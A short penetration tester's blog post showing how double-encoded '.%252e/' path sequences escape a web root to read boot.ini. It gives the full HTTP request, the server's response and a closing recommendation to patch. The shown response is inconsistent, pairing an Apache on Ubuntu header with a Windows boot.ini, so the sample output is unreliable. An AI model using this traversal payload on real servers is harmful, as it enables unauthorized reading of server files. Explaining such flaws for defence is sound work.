When application testing, I almost always find servers with out-dated patching. And it’s gold mines like these that provide free information disclosure. Web Root Escaping can provide attackers the ability to read arbitrary files on the server. So having a fully patched web server is key for protection with this vulnerability. Let’s check it out…

With this GET Request, I’m escaping the web root to read local files on the web server using double encoding:

GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
Referer: domain.com
Accept: */*
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20110614 Firefox/3.6.18
Host: domain.com
Connection: Keep-Alive

The response results in the below output, and I can now view the server’s boot.ini file contents remotely through the web application:

HTTP/1.1 200 OK
Date: Thu, 31 Oct 2013 12:42:28 GMT
Server: Apache/2.2.22 (Ubuntu)
Content-Disposition: attachment; filename=../../boot.ini
Content-Language: en-US
Content-Length: 265
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8

[boot loader]
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Windows XP Professional” /fastdetect
multi(0)disk(0)rdisk(0)partition(2)\WINNT=”Windows 2000 Professional” /fastdetect

In summary, ensure you are running the latest version of web application server, and inquire with the vendor whether there are any patches/updates available to mitigate this vulnerability specifically.

Happy HTTP Halloween!